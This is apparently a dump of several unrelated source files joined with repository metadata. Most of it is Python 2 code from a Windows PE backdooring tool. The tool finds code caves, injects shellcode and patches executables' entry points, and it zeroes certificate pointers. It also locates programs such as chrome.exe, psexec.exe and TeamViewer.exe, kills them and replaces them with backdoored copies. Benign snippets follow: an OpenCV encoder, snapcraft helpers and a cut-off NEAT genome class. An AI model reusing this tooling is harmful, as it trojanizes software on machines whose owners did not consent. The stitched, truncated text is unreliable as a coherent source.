caveSpecs.append(Tracking)
caveTracker.append(caveSpecs)
count = 1
caveSpecs = []
Tracking += 1
for caves in caveTracker:
for section in self.flItms['Sections']:
sectionFound = False
if caves[0] >= section[4] and caves[1] <= (section[3] + section[4]) and \
caves[1] - caves[0] >= SIZE_CAVE_TO_FIND:
print "We have a winner:", section[0]
print '->Begin Cave', hex(caves[0])
print '->End of Cave', hex(caves[1])
print 'Size of Cave (int)', caves[1] - caves[0]
print 'SizeOfRawData', hex(section[3])
print 'PointerToRawData', hex(section[4])
print 'End of Raw Data:', hex(section[3] + section[4])
print '*' * 50
sectionFound = True
break
if sectionFound is False:
try:
print "No section"
print '->Begin Cave', hex(caves[0])
print '->End of Cave', hex(caves[1])
print 'Size of Cave (int)', caves[1] - caves[0]
print '*' * 50
except Exception as e:
print str(e)
print "[*] Total of %s caves found" % len(caveTracker)
self.binary.close()
def find_cave(self):
"""This function finds all code caves, allowing the user
to pick the cave for injecting shellcode."""
len_allshells = ()
if self.flItms['cave_jumping'] is True:
for item in self.flItms['allshells']:
len_allshells += (len(item), )
len_allshells += (len(self.flItms['resumeExe']), )
SIZE_CAVE_TO_FIND = sorted(len_allshells)[0]
else:
SIZE_CAVE_TO_FIND = self.flItms['shellcode_length']
len_allshells = (self.flItms['shellcode_length'], )
print "[*] Looking for caves that will fit the minimum "\
"shellcode length of %s" % SIZE_CAVE_TO_FIND
print "[*] All caves lengths: ", len_allshells
Tracking = 0
count = 1
#BeginCave=0
caveTracker = []
caveSpecs = []
self.binary.seek(0)
while True:
try:
s = struct.unpack("<b", self.binary.read(1))[0]
except: # Exception as e:
#print "CODE CAVE", str(e)
break
if s == 0:
if count == 1:
BeginCave = Tracking
count += 1
else:
if count >= SIZE_CAVE_TO_FIND:
caveSpecs.append(BeginCave)
caveSpecs.append(Tracking)
caveTracker.append(caveSpecs)
count = 1
caveSpecs = []
Tracking += 1
pickACave = {}
for i, caves in enumerate(caveTracker):
i += 1
for section in self.flItms['Sections']:
sectionFound = False
try:
if caves[0] >= section[4] and \
caves[1] <= (section[3] + section[4]) and \
caves[1] - caves[0] >= SIZE_CAVE_TO_FIND:
if self.VERBOSE is True:
print "Inserting code in this section:", section[0]
print '->Begin Cave', hex(caves[0])
print '->End of Cave', hex(caves[1])
print 'Size of Cave (int)', caves[1] - caves[0]
print 'SizeOfRawData', hex(section[3])
print 'PointerToRawData', hex(section[4])
print 'End of Raw Data:', hex(section[3] + section[4])
print '*' * 50
JMPtoCodeAddress = (section[2] + caves[0] - section[4] -
5 - self.flItms['AddressOfEntryPoint'])
sectionFound = True
pickACave[i] = [section[0], hex(caves[0]), hex(caves[1]),
caves[1] - caves[0], hex(section[4]),
hex(section[3] + section[4]), JMPtoCodeAddress]
break
except:
print "-End of File Found.."
break
if sectionFound is False:
if self.VERBOSE is True:
print "No section"
print '->Begin Cave', hex(caves[0])
print '->End of Cave', hex(caves[1])
print 'Size of Cave (int)', caves[1] - caves[0]
print '*' * 50
JMPtoCodeAddress = (section[2] + caves[0] - section[4] -
5 - self.flItms['AddressOfEntryPoint'])
try:
pickACave[i] = [None, hex(caves[0]), hex(caves[1]),
caves[1] - caves[0], None,
None, JMPtoCodeAddress]
except:
print "EOF"
print ("############################################################\n"
"The following caves can be used to inject code and possibly\n"
"continue execution.\n"
"**Don't like what you see? Use jump, single, append, or ignore.**\n"
"############################################################")
CavesPicked = {}
for k, item in enumerate(len_allshells):
print "[*] Cave {0} length as int: {1}".format(k + 1, item)
print "[*] Available caves: "
for ref, details in pickACave.iteritems():
if details[3] >= item:
print str(ref) + ".", ("Section Name: {0}; Section Begin: {4} "
"End: {5}; Cave begin: {1} End: {2}; "
"Cave Size: {3}".format(details[0], details[1], details[2],
details[3], details[4], details[5],
details[6]))
while True:
try:
self.CAVE_MINER_TRACKER
except:
self.CAVE_MINER_TRACKER = 0
print "*" * 50
selection = raw_input("[!] Enter your selection: ")
try:
selection = int(selection)
print "[!] Using selection: %s" % selection
try:
if self.CHANGE_ACCESS is True:
if pickACave[selection][0] is not None:
self.change_section_flags(pickACave[selection][0])
CavesPicked[k] = pickACave[selection]
break
except:
print "[!!!!] User selection beyond the bounds of available caves."
print "[!!!!] Try a number or the following commands:"
print "[!!!!] append or a, jump or j, ignore or i, single or s"
print "[!!!!] TRY AGAIN."
continue
except:
pass
breakOutValues = ['append', 'jump', 'single', 'ignore', 'a', 'j', 's', 'i']
if selection.lower() in breakOutValues:
return selection
return CavesPicked
def runas_admin(self):
"""
        This method jumps to the .rsrc section and checks for
the following string: requestedExecutionLevel level="highestAvailable"
"""
#g = open(flItms['filename'], "rb")
runas_admin = False
print "[*] Checking Runas_admin"
if 'rsrcPointerToRawData' in self.flItms:
self.binary.seek(self.flItms['rsrcPointerToRawData'], 0)
search_lngth = len('requestedExecutionLevel level="highestAvailable"')
data_read = 0
while data_read < self.flItms['rsrcSizeRawData']:
self.binary.seek(self.flItms['rsrcPointerToRawData'] + data_read, 0)
temp_data = self.binary.read(search_lngth)
if temp_data == 'requestedExecutionLevel level="highestAvailable"':
runas_admin = True
break
data_read += 1
if runas_admin is True:
print "[*] %s must run with highest available privileges" % self.FILE
else:
print "[*] %s does not require highest available privileges" % self.FILE
return runas_admin
def support_check(self):
"""
        This function checks whether the current exe/dll is
        supported by this program. Returns False if not supported;
        otherwise it populates self.flItms.
"""
print "[*] Checking if binary is supported"
self.flItms['supported'] = False
#convert to with open FIX
self.binary = open(self.FILE, "r+b")
if self.binary.read(2) != "\x4d\x5a":
print "%s not a PE File" % self.FILE
return False
self.gather_file_info_win()
if self.flItms is False:
return False
if MachineTypes[hex(self.flItms['MachineType'])] not in supported_types:
for item in self.flItms:
print item + ':', self.flItms[item]
print ("This program does not support this format: %s"
% MachineTypes[hex(self.flItms['MachineType'])])
else:
self.flItms['supported'] = True
targetFile = intelCore(self.flItms, self.binary, self.VERBOSE)
if self.flItms['Characteristics'] - 0x2000 > 0 and self.PATCH_DLL is False:
return False
if self.flItms['Magic'] == int('20B', 16) and (self.IMAGE_TYPE == 'ALL' or self.IMAGE_TYPE == 'x64'):
#if self.IMAGE_TYPE == 'ALL' or self.IMAGE_TYPE == 'x64':
targetFile.pe64_entry_instr()
elif self.flItms['Magic'] == int('10b', 16) and (self.IMAGE_TYPE == 'ALL' or self.IMAGE_TYPE == 'x86'):
#if self.IMAGE_TYPE == 'ALL' or self.IMAGE_TYPE == 'x32':
targetFile.pe32_entry_instr()
else:
self.flItms['supported'] = False
if self.CHECK_ADMIN is True:
self.flItms['runas_admin'] = self.runas_admin()
if self.VERBOSE is True:
self.print_flItms(self.flItms)
if self.flItms['supported'] is False:
return False
self.binary.close()
def patch_pe(self):
"""
This function operates the sequence of all involved
functions to perform the binary patching.
"""
print "[*] In the backdoor module"
if self.INJECTOR is False:
os_name = os.name
if not os.path.exists("backdoored"):
os.makedirs("backdoored")
if os_name == 'nt':
self.OUTPUT = "backdoored\\" + self.OUTPUT
else:
self.OUTPUT = "backdoored/" + self.OUTPUT
issupported = self.support_check()
if issupported is False:
return None
self.flItms['NewCodeCave'] = self.ADD_SECTION
self.flItms['cave_jumping'] = self.CAVE_JUMPING
self.flItms['CavesPicked'] = {}
self.flItms['LastCaveAddress'] = 0
self.flItms['stager'] = False
self.flItms['supplied_shellcode'] = self.SUPPLIED_SHELLCODE
theResult = self.set_shells()
if theResult is False or self.flItms['allshells'] is False:
return False
#Creating file to backdoor
self.flItms['backdoorfile'] = self.OUTPUT
shutil.copy2(self.FILE, self.flItms['backdoorfile'])
self.binary = open(self.flItms['backdoorfile'], "r+b")
#reserve space for shellcode
targetFile = intelCore(self.flItms, self.binary, self.VERBOSE)
# Finding the length of the resume Exe shellcode
if self.flItms['Magic'] == int('20B', 16):
_, self.flItms['resumeExe'] = targetFile.resume_execution_64()
else:
_, self.flItms['resumeExe'] = targetFile.resume_execution_32()
shellcode_length = len(self.flItms['shellcode'])
self.flItms['shellcode_length'] = shellcode_length + len(self.flItms['resumeExe'])
caves_set = False
while caves_set is False and self.flItms['NewCodeCave'] is False:
#if self.flItms['NewCodeCave'] is False:
#self.flItms['JMPtoCodeAddress'], self.flItms['CodeCaveLOC'] = (
self.flItms['CavesPicked'] = self.find_cave()
if type(self.flItms['CavesPicked']) == str:
if self.flItms['CavesPicked'].lower() in ['append', 'a']:
self.flItms['JMPtoCodeAddress'] = None
self.flItms['CodeCaveLOC'] = 0
self.flItms['cave_jumping'] = False
self.flItms['CavesPicked'] = {}
print "-resetting shells"
self.set_shells()
caves_set = True
elif self.flItms['CavesPicked'].lower() in ['jump', 'j']:
self.flItms['JMPtoCodeAddress'] = None
self.flItms['CodeCaveLOC'] = 0
self.flItms['cave_jumping'] = True
self.flItms['CavesPicked'] = {}
print "-resetting shells"
self.set_shells()
continue
elif self.flItms['CavesPicked'].lower() in ['single', 's']:
self.flItms['JMPtoCodeAddress'] = None
self.flItms['CodeCaveLOC'] = 0
self.flItms['cave_jumping'] = False
self.flItms['CavesPicked'] = {}
print "-resetting shells"
self.set_shells()
continue
elif self.flItms['CavesPicked'].lower() in ['ignore', 'i']:
#Let's say we don't want to patch a binary
return None
elif self.flItms['CavesPicked'] is None:
return None
else:
self.flItms['JMPtoCodeAddress'] = self.flItms['CavesPicked'].iteritems().next()[1][6]
caves_set = True
#else:
# caves_set = True
#If no cave found, continue to create one.
if self.flItms['JMPtoCodeAddress'] is None or self.flItms['NewCodeCave'] is True:
self.create_code_cave()
self.flItms['NewCodeCave'] = True
print "- Adding a new section to the exe/dll for shellcode injection"
else:
self.flItms['LastCaveAddress'] = self.flItms['CavesPicked'][len(self.flItms['CavesPicked']) - 1][6]
#Patch the entry point
targetFile = intelCore(self.flItms, self.binary, self.VERBOSE)
targetFile.patch_initial_instructions()
if self.flItms['Magic'] == int('20B', 16):
ReturnTrackingAddress, self.flItms['resumeExe'] = targetFile.resume_execution_64()
else:
ReturnTrackingAddress, self.flItms['resumeExe'] = targetFile.resume_execution_32()
self.set_shells()
if self.flItms['cave_jumping'] is True:
if self.flItms['stager'] is False:
temp_jmp = "\xe9"
breakupvar = eat_code_caves(self.flItms, 1, 2)
test_length = int(self.flItms['CavesPicked'][2][1], 16) - int(self.flItms['CavesPicked'][1][1], 16) - len(self.flItms['allshells'][1]) - 5
if test_length < 0:
temp_jmp += struct.pack("<I", 0xffffffff - abs(breakupvar - len(self.flItms['allshells'][1]) - 4))
else:
temp_jmp += struct.pack("<I", breakupvar - len(self.flItms['allshells'][1]) - 5)
self.flItms['allshells'] += (self.flItms['resumeExe'], )
self.flItms['completeShellcode'] = self.flItms['shellcode'] + self.flItms['resumeExe']
if self.flItms['NewCodeCave'] is True:
self.binary.seek(self.flItms['newSectionPointerToRawData'] + self.flItms['buffer'])
self.binary.write(self.flItms['completeShellcode'])
if self.flItms['cave_jumping'] is True:
for i, item in self.flItms['CavesPicked'].iteritems():
self.binary.seek(int(self.flItms['CavesPicked'][i][1], 16))
self.binary.write(self.flItms['allshells'][i])
#So we can jump to our resumeExe shellcode
if i == (len(self.flItms['CavesPicked']) - 2) and self.flItms['stager'] is False:
self.binary.write(temp_jmp)
else:
for i, item in self.flItms['CavesPicked'].iteritems():
if i == 0:
self.binary.seek(int(self.flItms['CavesPicked'][i][1], 16))
self.binary.write(self.flItms['completeShellcode'])
#Patch certTable
if self.ZERO_CERT is True:
print "[*] Overwriting certificate table pointer"
self.binary.seek(self.flItms['CertTableLOC'], 0)
self.binary.write("\x00\x00\x00\x00\x00\x00\x00\x00")
print "[*] {0} backdooring complete".format(self.FILE)
self.binary.close()
if self.VERBOSE is True:
self.print_flItms(self.flItms)
return True
def output_options(self):
"""
Output file check.
"""
if not self.OUTPUT:
self.OUTPUT = os.path.basename(self.FILE)
def set_shells(self):
"""
This function sets the shellcode.
"""
print "[*] Looking for and setting selected shellcode"
if self.flItms['Magic'] == int('10B', 16):
self.flItms['bintype'] = winI32_shellcode
if self.flItms['Magic'] == int('20B', 16):
self.flItms['bintype'] = winI64_shellcode
if not self.SHELL:
print "You must choose a backdoor to add: (use -s)"
for item in dir(self.flItms['bintype']):
if "__" in item:
continue
elif ("returnshellcode" == item
or "pack_ip_addresses" == item
or "eat_code_caves" == item
or 'ones_compliment' == item
or 'resume_execution' in item
or 'returnshellcode' in item):
continue
else:
print " {0}".format(item)
return False
if self.SHELL not in dir(self.flItms['bintype']):
print "The following %ss are available: (use -s)" % str(self.flItms['bintype']).split(".")[1]
for item in dir(self.flItms['bintype']):
#print item
if "__" in item:
continue
elif "returnshellcode" == item or "pack_ip_addresses" == item or "eat_code_caves" == item:
continue
else:
print " {0}".format(item)
return False
#else:
# shell_cmd = self.SHELL + "()"
self.flItms['shells'] = self.flItms['bintype'](self.HOST, self.PORT, self.SUPPLIED_SHELLCODE)
self.flItms['allshells'] = getattr(self.flItms['shells'], self.SHELL)(self.flItms, self.flItms['CavesPicked'])
self.flItms['shellcode'] = self.flItms['shells'].returnshellcode()
def injector(self):
"""
The injector module will hunt and injection shellcode into
targets that are in the list_of_targets dict.
Data format DICT: {process_name_to_backdoor :
[('dependencies to kill', ),
'service to kill', restart=True/False],
}
"""
list_of_targets = {'chrome.exe':
[('chrome.exe', ), None, True], 'hamachi-2.exe':
[('hamachi-2.exe', ), "Hamachi2Svc", True],
'tcpview.exe': [('tcpview.exe',), None, True],
#'rpcapd.exe':
#[('rpcapd.exe'), None, False],
'psexec.exe':
[('psexec.exe',), 'PSEXESVC.exe', False],
'vncserver.exe':
[('vncserver.exe', ), 'vncserver', True],
# must append code cave for vmtoolsd.exe
'vmtoolsd.exe':
[('vmtools.exe', 'vmtoolsd.exe'), 'VMTools', True],
'nc.exe': [('nc.exe', ), None, False],
'Start Tor Browser.exe':
[('Start Tor Browser.exe', ), None, False],
'procexp.exe': [('procexp.exe',
'procexp64.exe'), None, True],
'procmon.exe': [('procmon.exe',
'procmon64.exe'), None, True],
'TeamViewer.exe': [('tv_x64.exe',
'tv_x32.exe'), None, True]
}
print "[*] Beginning injector module"
os_name = os.name
if os_name == 'nt':
if "PROGRAMFILES(x86)" in os.environ:
print "-You have a 64 bit system"
system_type = 64
else:
print "-You have a 32 bit system"
system_type = 32
else:
print "This works only on windows. :("
sys.exit()
winversion = platform.version()
rootdir = os.path.splitdrive(sys.executable)[0]
#print rootdir
targetdirs = []
excludedirs = []
#print system_info
winXP2003x86targetdirs = [rootdir + '\\']
winXP2003x86excludedirs = [rootdir + '\\Windows\\',
rootdir + '\\RECYCLER\\',
'\\VMWareDnD\\']
vista7win82012x64targetdirs = [rootdir + '\\']
vista7win82012x64excludedirs = [rootdir + '\\Windows\\',
rootdir + '\\RECYCLER\\',
'\\VMwareDnD\\']
#need win2003, win2008, win8
if "5.0." in winversion:
print "-OS is 2000"
targetdirs = targetdirs + winXP2003x86targetdirs
excludedirs = excludedirs + winXP2003x86excludedirs
elif "5.1." in winversion:
print "-OS is XP"
if system_type == 64:
targetdirs.append(rootdir + '\\Program Files (x86)\\')
excludedirs.append(vista7win82012x64excludedirs)
else:
targetdirs = targetdirs + winXP2003x86targetdirs
excludedirs = excludedirs + winXP2003x86excludedirs
elif "5.2." in winversion:
print "-OS is 2003"
if system_type == 64:
targetdirs.append(rootdir + '\\Program Files (x86)\\')
excludedirs.append(vista7win82012x64excludedirs)
else:
targetdirs = targetdirs + winXP2003x86targetdirs
excludedirs = excludedirs + winXP2003x86excludedirs
elif "6.0." in winversion:
print "-OS is Vista/2008"
if system_type == 64:
targetdirs = targetdirs + vista7win82012x64targetdirs
excludedirs = excludedirs + vista7win82012x64excludedirs
else:
targetdirs.append(rootdir + '\\Program Files\\')
excludedirs.append(rootdir + '\\Windows\\')
elif "6.1." in winversion:
print "-OS is Win7/2008"
if system_type == 64:
targetdirs = targetdirs + vista7win82012x64targetdirs
excludedirs = excludedirs + vista7win82012x64excludedirs
else:
targetdirs.append(rootdir + '\\Program Files\\')
excludedirs.append(rootdir + '\\Windows\\')
elif "6.2." in winversion:
print "-OS is Win8/2012"
targetdirs = targetdirs + vista7win82012x64targetdirs
excludedirs = excludedirs + vista7win82012x64excludedirs
filelist = set()
exclude = False
for path in targetdirs:
for root, subFolders, files in os.walk(path):
for directory in excludedirs:
if directory.lower() in root.lower():
#print directory.lower(), root.lower()
#print "Path not allowed", root
exclude = True
#print exclude
break
if exclude is False:
for _file in files:
f = os.path.join(root, _file)
for target, items in list_of_targets.iteritems():
if target.lower() == _file.lower():
#print target, f
print "-- Found the following file:", root + '\\' + _file
filelist.add(f)
#print exclude
exclude = False
#grab tasklist
process_list = []
all_process = os.popen("tasklist.exe")
ap = all_process.readlines()
all_process.close()
ap.pop(0) # remove blank line
ap.pop(0) # remove header line
ap.pop(0) # remove this ->> =======
for process in ap:
process_list.append(process.split())
#print process_list
#print filelist
for target in filelist:
service_target = False
running_proc = False
#get filename
#support_result = support_check(target, 0)
#if support_result is False:
# continue
filename = os.path.basename(target)
for process in process_list:
#print process
for setprocess, items in list_of_targets.iteritems():
if setprocess.lower() in target.lower():
#print setprocess, process
for item in items[0]:
if item.lower() in [x.lower() for x in process]:
print "- Killing process:", item
try:
#print process[1]
os.system("taskkill /F /PID %i" %
int(process[1]))
running_proc = True
except Exception as e:
print str(e)
if setprocess.lower() in [x.lower() for x in process]:
#print True, items[0], items[1]
if items[1] is not None:
print "- Killing Service:", items[1]
try:
os.system('net stop %s' % items[1])
except Exception as e:
print str(e)
service_target = True
time.sleep(1)
#backdoor the targets here:
print "*" * 50
self.FILE = target
self.OUTPUT = os.path.basename(self.FILE + '.bd')
print "self.OUTPUT", self.OUTPUT
print "- Backdooring:", self.FILE
result = self.patch_pe()
if result:
pass
else:
continue
shutil.copy2(self.FILE, self.FILE + self.SUFFIX)
os.chmod(self.FILE, stat.S_IRWXU | stat.S_IRWXG | stat.S_IRWXO)
time.sleep(1)
try:
os.unlink(self.FILE)
except:
print "unlinking error"
time.sleep(.5)
try:
shutil.copy2(self.OUTPUT, self.FILE)
except:
os.system('move {0} {1}'.format(self.FILE, self.OUTPUT))
time.sleep(.5)
os.remove(self.OUTPUT)
print (" - The original file {0} has been renamed to {1}".format(self.FILE,
self.FILE + self.SUFFIX))
if self.DELETE_ORIGINAL is True:
print "!!Warning Deleteing Original File!!"
os.remove(self.FILE + self.SUFFIX)
if service_target is True:
#print "items[1]:", list_of_targets[filename][1]
os.system('net start %s' % list_of_targets[filename][1])
else:
try:
if (list_of_targets[filename][2] is True and
running_proc is True):
subprocess.Popen([self.FILE, ])
print "- Restarting:", self.FILE
else:
print "-- %s was not found online - not restarting" % self.FILE
except:
if (list_of_targets[filename.lower()][2] is True and
running_proc is True):
subprocess.Popen([self.FILE, ])
print "- Restarting:", self.FILE
else:
print "-- %s was not found online - not restarting" % self.FILE
| gpl-3.0 | -1,369,329,645,116,319,000 | 45.241232 | 154 | 0.514337 | false |
learningequality/video-vectorization | video_processing/processors/opencv_video_encoder.py | 1 | 1460 | """A video encoder processor that uses OpenCV to write video frames to a file.
A wrapper around the OpenCV VideoWriter class.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from video_processing import stream_processor
import cv2
class OpenCVVideoEncoderProcessor(stream_processor.ProcessorBase):
"""Processor for encoding video using OpenCV."""
def __init__(self, configuration):
self._output_video_file = configuration.get('output_video_file', '')
self._video_stream_name = configuration.get('video_stream_name', 'video')
self._fourcc_string = configuration.get('fourcc', 'DIVX')
self._index = 0
def open(self, stream_set):
fourcc = cv2.VideoWriter_fourcc(*self._fourcc_string)
frame_rate = stream_set.frame_rate_hz
header = stream_set.stream_headers[
self._video_stream_name].header_data
self._video_writer = cv2.VideoWriter(self._output_video_file, fourcc,
frame_rate,
(header.image_width,
header.image_height))
return stream_set
def process(self, frame_set):
if frame_set.get(self._video_stream_name, False):
video_frame = frame_set[self._video_stream_name].data
self._video_writer.write(video_frame)
return frame_set
def close(self):
self._video_writer.release()
return []
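# Hypothetical usage sketch (the configuration keys and the stream_set/frame_set
# objects are supplied by the surrounding video_processing pipeline):
#   encoder = OpenCVVideoEncoderProcessor({'output_video_file': 'out.avi'})
#   encoder.open(stream_set)
#   encoder.process(frame_set)
#   encoder.close()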
| mit | -5,255,766,905,365,025,000 | 33.761905 | 78 | 0.652055 | false |
cprov/snapcraft | snapcraft/internal/common.py | 1 | 8803 | # -*- Mode:Python; indent-tabs-mode:nil; tab-width:4 -*-
#
# Copyright (C) 2015-2017 Canonical Ltd
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# Data/methods shared between plugins and snapcraft
import glob
import logging
import math
import os
import shlex
import shutil
import subprocess
import sys
import tempfile
import urllib
from contextlib import suppress
from typing import Callable, List
from snapcraft.internal import errors
SNAPCRAFT_FILES = [
"snapcraft.yaml",
".snapcraft.yaml",
"parts",
"stage",
"prime",
"snap",
]
_DEFAULT_PLUGINDIR = os.path.join(sys.prefix, "share", "snapcraft", "plugins")
_plugindir = _DEFAULT_PLUGINDIR
_DEFAULT_SCHEMADIR = os.path.join(sys.prefix, "share", "snapcraft", "schema")
_schemadir = _DEFAULT_SCHEMADIR
_DEFAULT_LIBRARIESDIR = os.path.join(sys.prefix, "share", "snapcraft", "libraries")
_librariesdir = _DEFAULT_LIBRARIESDIR
_DOCKERENV_FILE = "/.dockerenv"
MAX_CHARACTERS_WRAP = 120
env = [] # type: List[str]
logger = logging.getLogger(__name__)
def assemble_env():
return "\n".join(["export " + e for e in env])
def _run(cmd: List[str], runner: Callable, **kwargs):
assert isinstance(cmd, list), "run command must be a list"
cmd_string = " ".join([shlex.quote(c) for c in cmd])
# FIXME: This is gross to keep writing this, even when env is the same
with tempfile.TemporaryFile(mode="w+") as run_file:
print(assemble_env(), file=run_file)
print("exec {}".format(cmd_string), file=run_file)
run_file.flush()
run_file.seek(0)
try:
return runner(["/bin/sh"], stdin=run_file, **kwargs)
except subprocess.CalledProcessError as call_error:
raise errors.SnapcraftCommandError(
command=cmd_string, call_error=call_error
) from call_error
def run(cmd: List[str], **kwargs) -> None:
_run(cmd, subprocess.check_call, **kwargs)
def run_output(cmd: List[str], **kwargs) -> str:
output = _run(cmd, subprocess.check_output, **kwargs)
try:
return output.decode(sys.getfilesystemencoding()).strip()
except UnicodeEncodeError:
logger.warning("Could not decode output for {!r} correctly".format(cmd))
return output.decode("latin-1", "surrogateescape").strip()
def get_core_path(base):
"""Returns the path to the core base snap."""
return os.path.join(os.path.sep, "snap", base, "current")
def format_snap_name(snap, *, allow_empty_version: bool = False) -> str:
"""Return a filename representing the snap depending on snap attributes.
:param dict snap: a dictionary of keys containing name, version and arch.
:param bool allow_empty_version: if set a filename without a version is
allowed.
"""
if allow_empty_version and snap.get("version") is None:
template = "{name}_{arch}.snap"
else:
template = "{name}_{version}_{arch}.snap"
if "arch" not in snap:
snap["arch"] = snap.get("architectures", None)
if not snap["arch"]:
snap["arch"] = "all"
elif len(snap["arch"]) == 1:
snap["arch"] = snap["arch"][0]
else:
snap["arch"] = "multi"
return template.format(**snap)
def is_snap() -> bool:
snap_name = os.environ.get("SNAP_NAME", "")
is_snap = snap_name == "snapcraft"
logger.debug(
"snapcraft is running as a snap {!r}, "
"SNAP_NAME set to {!r}".format(is_snap, snap_name)
)
return is_snap
def is_docker_instance() -> bool:
return os.path.exists(_DOCKERENV_FILE)
def set_plugindir(plugindir):
global _plugindir
_plugindir = plugindir
def get_plugindir():
return _plugindir
def set_schemadir(schemadir):
global _schemadir
_schemadir = schemadir
def get_schemadir():
return _schemadir
def get_arch_triplet():
raise errors.PluginOutdatedError("use 'project.arch_triplet'")
def get_arch():
raise errors.PluginOutdatedError("use 'project.deb_arch'")
def get_parallel_build_count():
raise errors.PluginOutdatedError("use 'parallel_build_count'")
def set_librariesdir(librariesdir):
global _librariesdir
_librariesdir = librariesdir
def get_librariesdir():
return _librariesdir
def get_python2_path(root):
"""Return a valid PYTHONPATH or raise an exception."""
python_paths = glob.glob(
os.path.join(root, "usr", "lib", "python2*", "dist-packages")
)
try:
return python_paths[0]
except IndexError:
raise errors.SnapcraftEnvironmentError(
"PYTHONPATH cannot be set for {!r}".format(root)
)
def get_url_scheme(url):
return urllib.parse.urlparse(url).scheme
def isurl(url):
return get_url_scheme(url) != ""
def reset_env():
global env
env = []
def get_terminal_width(max_width=MAX_CHARACTERS_WRAP):
if os.isatty(1):
width = shutil.get_terminal_size().columns
else:
width = MAX_CHARACTERS_WRAP
if max_width:
width = min(max_width, width)
return width
def format_output_in_columns(
elements_list, max_width=MAX_CHARACTERS_WRAP, num_col_spaces=2
):
"""Return a formatted list of strings ready to be printed line by line
elements_list is the list of elements ready to be printed on the output
    max_width is the number of characters the output shouldn't exceed
num_col_spaces is the number of spaces set between 2 columns"""
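    # e.g. format_output_in_columns(['aa', 'b', 'cccc', 'dd'], max_width=10)
    # yields ['aa  cccc', 'b   dd  ']: two lines, each column padded to the
    # width of its widest element and separated by num_col_spaces spaces.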
# First, try to get the starting point in term of number of lines
total_num_chars = sum([len(elem) for elem in elements_list])
num_lines = math.ceil(
(total_num_chars + (len(elements_list) - 1) * num_col_spaces) / max_width
)
sep = " " * num_col_spaces
candidate_output = []
while not candidate_output:
# dispatch elements in resulting list until num_lines
for i, element in enumerate(elements_list):
# for new columns, get the maximum width of this column
if i % num_lines == 0:
col_width = 0
for j in range(i, i + num_lines):
# ignore non existing elements at the end
with suppress(IndexError):
col_width = max(len(elements_list[j]), col_width)
if i < num_lines:
candidate_output.append([])
candidate_output[i % num_lines].append(element.ljust(col_width))
# check that any line (like the first one) is still smaller than
# max_width
if len(sep.join(candidate_output[0])) > max_width:
# reset and try with one more line
num_lines += 1
candidate_output = []
result_output = []
for i, line in enumerate(candidate_output):
result_output.append(sep.join(candidate_output[i]))
return result_output
def get_include_paths(root, arch_triplet):
paths = [
os.path.join(root, "include"),
os.path.join(root, "usr", "include"),
os.path.join(root, "include", arch_triplet),
os.path.join(root, "usr", "include", arch_triplet),
]
return [p for p in paths if os.path.exists(p)]
def get_library_paths(root, arch_triplet, existing_only=True):
"""Returns common library paths for a snap.
If existing_only is set the paths returned must exist for
the root that was set.
"""
paths = [
os.path.join(root, "lib"),
os.path.join(root, "usr", "lib"),
os.path.join(root, "lib", arch_triplet),
os.path.join(root, "usr", "lib", arch_triplet),
]
if existing_only:
paths = [p for p in paths if os.path.exists(p)]
return paths
def get_pkg_config_paths(root, arch_triplet):
paths = [
os.path.join(root, "lib", "pkgconfig"),
os.path.join(root, "lib", arch_triplet, "pkgconfig"),
os.path.join(root, "usr", "lib", "pkgconfig"),
os.path.join(root, "usr", "lib", arch_triplet, "pkgconfig"),
os.path.join(root, "usr", "share", "pkgconfig"),
os.path.join(root, "usr", "local", "lib", "pkgconfig"),
os.path.join(root, "usr", "local", "lib", arch_triplet, "pkgconfig"),
os.path.join(root, "usr", "local", "share", "pkgconfig"),
]
return [p for p in paths if os.path.exists(p)]
| gpl-3.0 | 2,794,462,511,097,129,500 | 28.639731 | 83 | 0.635352 | false |
machinebrains/neat-python | neatsociety/genome.py | 1 | 18567 | from random import choice, gauss, randint, random, shuffle
import math
class Genome(object):
""" A genome for general recurrent neural networks. """
def __init__(self, ID, config, parent1_id, parent2_id):
self.ID = ID
self.config = config
self.num_inputs = config.input_nodes
self.num_outputs = config.output_nodes
# (id, gene) pairs for connection and node gene sets.
self.conn_genes = {}
self.node_genes = {}
self.fitness = None
self.species_id = None
# my parents id: helps in tracking genome's genealogy
self.parent1_id = parent1_id
self.parent2_id = parent2_id
def mutate(self, innovation_indexer):
""" Mutates this genome """
# TODO: Make a configuration item to choose whether or not multiple mutations can happen at once.
if random() < self.config.prob_add_node:
self.mutate_add_node(innovation_indexer)
if random() < self.config.prob_add_conn:
self.mutate_add_connection(innovation_indexer)
if random() < self.config.prob_delete_node:
self.mutate_delete_node()
if random() < self.config.prob_delete_conn:
self.mutate_delete_connection()
# Mutate connection genes (weights, enabled, etc.).
for cg in self.conn_genes.values():
cg.mutate(self.config)
# Mutate node genes (bias, response, etc.).
for ng in self.node_genes.values():
if ng.type != 'INPUT':
ng.mutate(self.config)
return self
def crossover(self, other, child_id):
""" Crosses over parents' genomes and returns a child. """
# Parents must belong to the same species.
assert self.species_id == other.species_id, 'Different parents species ID: {0} vs {1}'.format(self.species_id,
other.species_id)
# TODO: if they're of equal fitness, choose the shortest
if self.fitness > other.fitness:
parent1 = self
parent2 = other
else:
parent1 = other
parent2 = self
# creates a new child
child = self.__class__(child_id, self.config, self.ID, other.ID)
child.inherit_genes(parent1, parent2)
child.species_id = parent1.species_id
return child
def inherit_genes(self, parent1, parent2):
""" Applies the crossover operator. """
assert (parent1.fitness >= parent2.fitness)
# Crossover connection genes
for cg1 in parent1.conn_genes.values():
try:
cg2 = parent2.conn_genes[cg1.key]
except KeyError:
# Copy excess or disjoint genes from the fittest parent
self.conn_genes[cg1.key] = cg1.copy()
else:
if cg2.is_same_innov(cg1): # Always true for *global* INs
# Homologous gene found
new_gene = cg1.get_child(cg2)
else:
new_gene = cg1.copy()
self.conn_genes[new_gene.key] = new_gene
# Crossover node genes
for ng1_id, ng1 in parent1.node_genes.items():
ng2 = parent2.node_genes.get(ng1_id)
if ng2 is None:
# copies extra genes from the fittest parent
new_gene = ng1.copy()
else:
# matching node genes: randomly selects the neuron's bias and response
new_gene = ng1.get_child(ng2)
assert new_gene.ID not in self.node_genes
self.node_genes[new_gene.ID] = new_gene
